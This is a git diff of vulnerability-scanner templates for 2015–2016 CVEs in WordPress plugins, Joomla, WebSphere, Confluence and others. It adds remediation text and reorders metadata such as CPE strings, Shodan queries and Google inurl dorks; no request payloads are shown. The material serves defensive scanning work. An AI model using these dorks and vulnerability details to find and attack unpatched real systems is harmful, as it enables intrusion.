sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability. + remediation: | + Upgrade to the latest version of WordPress sourceAFRICA (>=0.1.4) which includes a fix for this vulnerability. reference: - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html - https://wpvulndb.com/vulnerabilities/8169 @@ -15,13 +17,13 @@ info: cve-id: CVE-2015-6920 cwe-id: CWE-79 epss-score: 0.0016 - cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* epss-percentile: 0.52033 + cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: sourceafrica_project product: sourceafrica + framework: wordpress tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress http: diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 7cd96cac24..f3e6c625e2 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -6,6 +6,8 @@ info: severity: high description: | D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter. + remediation: | + Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html - https://www.exploit-db.com/exploits/39409/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2015-7245 cwe-id: CWE-22 epss-score: 0.96881 - cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* epss-percentile: 0.99575 + cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 vendor: d-link diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index db3fc64fdd..8aa056114e 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. + remediation: | + Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-7297 - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-7297 cwe-id: CWE-89 epss-score: 0.97564 - cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* epss-percentile: 0.99996 + cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 128bbac596..7da41df920 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL. + remediation: | + Update to the latest version of the WordPress Pie-Register plugin (2.0.19 or higher) to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt @@ -17,13 +19,13 @@ info: cve-id: CVE-2015-7377 cwe-id: CWE-79 epss-score: 0.00239 - cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* epss-percentile: 0.61218 + cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: genetechsolutions product: pie_register + framework: wordpress tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve http: diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index bc655c06fd..f38ade74c4 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -5,6 +5,8 @@ info: author: wdahlenb severity: critical description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). + remediation: | + Apply the latest security patches provided by IBM to mitigate this vulnerability. reference: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2015-7450 cwe-id: CWE-94 epss-score: 0.9741 - cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* epss-percentile: 0.99883 + cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.html:"IBM WebSphere Portal" vendor: ibm product: tivoli_common_reporting + shodan-query: http.html:"IBM WebSphere Portal" tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev http: diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index d0eb497ded..0252460cd3 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion. + remediation: | + Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/35933 - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.00151 - cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* epss-percentile: 0.50657 + cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index d14efbf129..af59249a0d 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. + remediation: | + Apply the latest security patches or upgrade to a newer version of Kentico CMS. reference: - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 @@ -15,8 +17,8 @@ info: cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other epss-score: 0.00233 - cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* epss-percentile: 0.60673 + cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kentico diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index ac4caccc5b..ed428ef892 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. + remediation: | + Upgrade to a version of SourceBans that is 2.0 or above, which includes a fix for this vulnerability. reference: - https://www.htbridge.com/advisory/HTB23273 - https://nvd.nist.gov/vuln/detail/CVE-2015-8349 @@ -14,8 +16,8 @@ info: cve-id: CVE-2015-8349 cwe-id: CWE-79 epss-score: 0.0013 - cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* epss-percentile: 0.47144 + cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gameconnect diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index a030973153..158d15948f 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. + remediation: | + Upgrade to a version higher than 5.8.17 to mitigate the vulnerability. reference: - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro - https://www.exploit-db.com/exploits/39170/ @@ -15,13 +17,13 @@ info: cve-id: CVE-2015-8399 cwe-id: CWE-200 epss-score: 0.9647 - cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* epss-percentile: 0.99388 + cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Confluence" vendor: atlassian product: confluence + shodan-query: http.component:"Atlassian Confluence" tags: edb,cve,cve2015,atlassian,confluence http: diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index cf82566970..cce93f1e64 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -5,6 +5,8 @@ info: author: emadshanab severity: high description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index. + remediation: | + Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates. reference: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 @@ -17,8 +19,8 @@ info: cve-id: CVE-2015-8813 cwe-id: CWE-918 epss-score: 0.00511 - cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* epss-percentile: 0.73635 + cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: umbraco diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 793ea8da08..2d94216a6d 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file "includes/nsp_search.php", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack. + remediation: Fixed in version 1.0.6 reference: - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 - https://g0blin.co.uk/g0blin-00057/ - https://wordpress.org/plugins/newstatpress/#developers - https://nvd.nist.gov/vuln/detail/CVE-2015-9312 - remediation: Fixed in version 1.0.6 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.36469 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: newstatpress_project product: newstatpress + framework: wordpress tags: cve2015,xss,authenticated,wp,newstatpress,wpscan,cve,wordpress,wp-plugin http: diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 78d1d5130e..2c504b159c 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. + remediation: Fixed in version 2.0.3 reference: - https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9 - http://cinu.pl/research/wp-plugins/mail_e28f19a8f03f0517f94cb9fea15d8525.html - https://wordpress.org/plugins/404-to-301/#developers - remediation: Fixed in version 2.0.3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2015-9323 cwe-id: CWE-89 epss-score: 0.00784 - cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:* epss-percentile: 0.79207 + cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 - framework: wordpress vendor: duckdev product: 404_to_301 + framework: wordpress tags: cve,cve2015,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated http: diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index a5cf4727a8..1204101b5c 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Symposium plugin (>=15.8.2) which includes a fix for this vulnerability. reference: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://wpvulndb.com/vulnerabilities/8175 @@ -16,14 +18,14 @@ info: cve-id: CVE-2015-9414 cwe-id: CWE-79 epss-score: 0.00111 - cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* epss-percentile: 0.43615 + cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/wp-symposium" - framework: wordpress vendor: wpsymposiumpro product: wp-symposium + framework: wordpress + google-query: inurl:"/wp-content/plugins/wp-symposium" tags: xss,wpscan,cve,cve2015,wordpress,wp-plugin http: diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 586c0d752c..648c45c099 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. + remediation: | + Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/37252 - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 @@ -14,14 +16,14 @@ info: cve-id: CVE-2015-9480 cwe-id: CWE-22 epss-score: 0.25055 - cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* epss-percentile: 0.9605 + cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/robotcpa" - framework: wordpress vendor: robot-cpa product: robotcpa + framework: wordpress + google-query: inurl:"/wp-content/plugins/robotcpa" tags: wp-plugin,lfi,edb,cve,cve2015,wordpress http: diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index dae11fb9ae..4db32683c5 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. + remediation: | + Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability. reference: - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html @@ -14,13 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2016-0957 epss-score: 0.06304 - cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* epss-percentile: 0.927 + cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" vendor: adobe product: dispatcher + shodan-query: http.component:"Adobe Experience Manager" tags: cve,cve2016,adobe,aem http: diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 9de0fafabf..25c2ae22a3 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 - https://wordpress.org/plugins/admin-font-editor @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-1000126 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45183 + cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/admin-font-editor" - framework: wordpress vendor: admin-font-editor_project product: admin-font-editor + framework: wordpress + google-query: inurl:"/wp-content/plugins/admin-font-editor" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index bd145b8e70..0f1d757108 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress AJAX Random Post 2.00 is vulnerable to reflected cross-site scripting. + remediation: | + Update to the latest version of the WordPress AJAX Random Post plugin (2.00 or higher) to fix this issue. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=494 - https://wordpress.org/plugins/ajax-random-post @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-1000127 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45183 + cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: ajax-random-post_project product: ajax-random-post + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 2430d002e1..7d168420bb 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress anti-plagiarism 3.6.0 and prior are vulnerable to reflected cross-site scripting. + remediation: | + Update the WordPress anti-plagiarism plugin to version >3.60 or apply the latest security patches provided by the vendor. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-1000128 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40571 + cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/anti-plagiarism" - framework: wordpress vendor: anti-plagiarism_project product: anti-plagiarism + framework: wordpress + google-query: inurl:"/wp-content/plugins/anti-plagiarism" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index fc1c42eecb..b6aae8a6bd 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress defa-online-image-protector plugin (version 3.3 or higher) to mitigate this vulnerability. reference: - https://wordpress.org/plugins/defa-online-image-protector - http://www.vapidlabs.com/wp/wp_advisory.php?v=449 @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-1000129 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45183 + cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/defa-online-image-protector" - framework: wordpress vendor: defa-online-image-protector_project product: defa-online-image-protector + framework: wordpress + google-query: inurl:"/wp-content/plugins/defa-online-image-protector" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 94f64c28bd..1cd7eca464 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability. reference: - https://wordpress.org/plugins/e-search - http://www.vapidlabs.com/wp/wp_advisory.php?v=394 @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-1000130 cwe-id: CWE-79 epss-score: 0.00093 - cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.38597 + cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/e-search" - framework: wordpress vendor: e-search_project product: e-search + framework: wordpress + google-query: inurl:"/wp-content/plugins/e-search" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index b0c528563d..b55f7cb4a0 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 - https://wordpress.org/plugins/e-search @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-1000131 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.40571 + cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/e-search" - framework: wordpress vendor: e-search_project product: esearch + framework: wordpress + google-query: inurl:"/wp-content/plugins/e-search" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 9f7a79031e..4f0854fcf0 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WordPress enhanced-tooltipglossary plugin (3.2.9 or higher) which includes a fix for this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 - https://wordpress.org/plugins/enhanced-tooltipglossary @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-1000132 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44589 + cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" - framework: wordpress vendor: cminds product: tooltip_glossary + framework: wordpress + google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 4848d6b312..0d81f509f8 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress forget-about-shortcode-buttons plugin (1.1.1) or apply the necessary patches. reference: - https://wordpress.org/plugins/forget-about-shortcode-buttons - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-1000133 cwe-id: CWE-79 epss-score: 0.00142 - cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49194 + cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" - framework: wordpress vendor: designsandcode product: forget_about_shortcode_buttons + framework: wordpress + google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 2a90f0f2f0..223cfb5ecb 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 - https://wordpress.org/plugins/hdw-tube @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-1000134 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40571 + cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/hdw-tube" - framework: wordpress vendor: hdw-tube_project product: hdw-tube + framework: wordpress + google-query: inurl:"/wp-content/plugins/hdw-tube" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 8be4bd8da8..794f281be7 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via mychannel.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=533 - https://wordpress.org/plugins/hdw-tube @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-1000135 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40571 + cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - 